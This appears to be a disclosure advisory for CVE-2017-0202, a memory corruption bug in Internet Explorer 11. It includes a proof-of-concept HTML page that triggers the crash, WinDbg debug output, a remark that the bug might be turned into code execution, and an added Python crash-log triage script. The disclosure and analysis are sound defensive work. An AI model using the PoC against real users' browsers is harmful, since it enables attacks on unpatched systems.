Microsoft Internet Explorer CStyleSheetArray::BuildListOfMatchedRules Memory Corruption

Ivan Fratric, packetstormsecurity.com (PACKETSTORM:142335), Apr 27, 2017
EPSS: 0.921 (High), 98.7th percentile

Microsoft IE: Memory corruption in CStyleSheetArray::BuildListOfMatchedRules
  
CVE-2017-0202  
  
  
There is a memory corruption vulnerability in Internet Explorer. The vulnerability was confirmed on Internet Explorer version 11.576.14393.0 (Update Version 11.0.38) running on Windows 10 64-bit, with page heap enabled for the iexplore.exe process.
  
PoC:  
  
===========================================================  
  
<!-- saved from url=(0014)about:internet -->  
<style>  
#details { transition-duration: 61s; }  
</style>  
<script>  
function go() {  
document.fgColor = "foo";  
m.setAttribute("foo", "bar");  
document.head.innerHTML = "a";  
}  
</script>  
<body onload=go()>  
<details id="details">  
<summary style="transform: scaleY(4)">  
<marquee id="m" bgcolor="rgb(135,114,244)">aaaaaaaaaaaaa</marquee>  
<style></style>  
  
===========================================================  
  
The crash happens in CStyleSheetArray::BuildListOfMatchedRules while attempting to read memory outside the bounds of the object pointed to by eax (possibly due to a type confusion issue, but I didn't investigate in detail). If that read succeeds and an attacker-controlled address is read into edi, this later leads to a write to the attacker-controlled address in CStyleSheetArray::BuildListOfProbableRules. Thus it might be possible to turn the issue into code execution.
  
Debug info:  
  
(d10.1504): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770  
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:  
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????  
  
0:021> r  
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770  
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc  
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202  
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:  
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????  
  
0:021> k  
# ChildEBP RetAddr   
00 173ddaa4 71eb3674 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77  
01 173ddd6c 71eb041e MSHTML!CElement::ApplyStyleSheets+0x504  
02 173ddd9c 720b43e5 MSHTML!CElement::ApplyDefaultFormat+0x8e  
03 173de1b0 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0xe25  
04 173de248 720b343a MSHTML!CElement::ComputeFormats+0x374  
05 173de274 720b36cd MSHTML!CFormatInfo::FindFormattingParent+0x45a  
06 173de690 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0x10d  
07 173de738 71ede88b MSHTML!CElement::ComputeFormats+0x374  
08 173de754 71ede3c4 MSHTML!CTreeNode::ComputeFormats+0x6b  
09 173df3b0 722e4e79 MSHTML!CTreeNode::ComputeFormatsHelper+0x34  
0a 173df3b8 7201745c MSHTML!CTreeNode::GetSvgFormatHelper+0xa  
0b 173df3c0 72756588 MSHTML!Tree::Style::HasCompositionItems+0x26  
0c 173df3cc 72787473 MSHTML!Layout::InlineLayout::HasCompositionItems+0x28  
0d 173df5dc 72788c30 MSHTML!CDispScroller::CalcScrollBits+0x526  
0e 173df6c8 72246c2a MSHTML!CDispScroller::InvalidateScrollDelta+0x147  
0f 173df6f4 71d8174e MSHTML!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xf8a1a  
10 173df710 71d81667 MSHTML!CRenderTaskApplyPSP::ProcessScrollerUpdateRequests+0x34  
11 173df740 71f0e9bb MSHTML!CRenderTaskApplyPSP::Execute+0xe7  
12 173df79c 71de27d3 MSHTML!CRenderThread::RenderThread+0x31b  
13 173df7ac 72fa17cd MSHTML!CRenderThread::StaticRenderThreadProc+0x23  
14 173df7e4 74c362c4 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x8d  
15 173df7f8 77700fd9 KERNEL32!BaseThreadInitThunk+0x24  
16 173df840 77700fa4 ntdll!__RtlUserThreadStart+0x2f  
17 173df850 00000000 ntdll!_RtlUserThreadStart+0x1b  
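As an added triage helper that is not part of the original report: the WinDbg output above can be checked mechanically. The script below (all names are assumed; the log excerpt is a constructed copy of the register dump and faulting instruction quoted above) confirms that the faulting address equals eax+0x124, that the access is a read, and that the target was unreadable, which with page heap enabled is consistent with a read past the end of the allocation into the guard page.

```python
import re

# Constructed excerpt of the WinDbg output quoted in the advisory:
# the exception line, the register dump, the symbol and the faulting instruction.
CRASH_LOG = """\
(d10.1504): Access violation - code c0000005 (first chance)
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????
"""

REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})")
# Faulting instruction: address, opcode bytes, mnemonic, operands, effective address.
MEM_RE = re.compile(
    r"^(?P<eip>[0-9a-f]{8}) [0-9a-f]+ (?P<mnem>\w+) (?P<ops>.*?)"
    r"\s+ds:[0-9a-f]{4}:(?P<addr>[0-9a-f]{8})=(?P<val>\S+)$", re.M)
SRC_RE = re.compile(r"\[(?P<base>e\w\w)\+(?P<off>[0-9a-f]+)h\]")
SYM_RE = re.compile(r"^(\S+!\S+)\+0x[0-9a-f]+:$", re.M)

def triage(log):
    """Classify a WinDbg access violation: direction, base register, offset, mapping."""
    regs = {m.group(1): int(m.group(2), 16) for m in REG_RE.finditer(log)}
    mem = MEM_RE.search(log)
    if not mem:
        raise ValueError("no faulting memory operand found")
    ops = mem.group("ops")
    src = SRC_RE.search(ops)
    base, off = src.group("base"), int(src.group("off"), 16)
    addr = int(mem.group("addr"), 16)
    # A memory operand on the right of the comma is the source, i.e. a read.
    _dst, srcop = [p.strip() for p in ops.split(",", 1)]
    sym = SYM_RE.search(log)
    return {
        "access": "read" if "[" in srcop else "write",
        "base_reg": base,
        "offset": off,
        "fault_addr": addr,
        # Sanity check that the debugger's effective address matches base+offset.
        "addr_consistent": regs[base] + off == addr,
        # "????????" means the debugger could not read the target at all:
        # an unmapped page, not a mapped object holding garbage.
        "unmapped": mem.group("val").startswith("?"),
        "function": sym.group(1) if sym else None,
    }

if __name__ == "__main__":
    for key, value in triage(CRASH_LOG).items():
        print(f"{key}: {value:#x}" if isinstance(value, int) and not isinstance(value, bool) else f"{key}: {value}")
```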
  
  
This bug is subject to a 90 day disclosure deadline. If 90 days elapse  
without a broadly available patch, then the bug report will automatically  
become visible to the public.  
  
  
  
  
Found by: ifratric  
  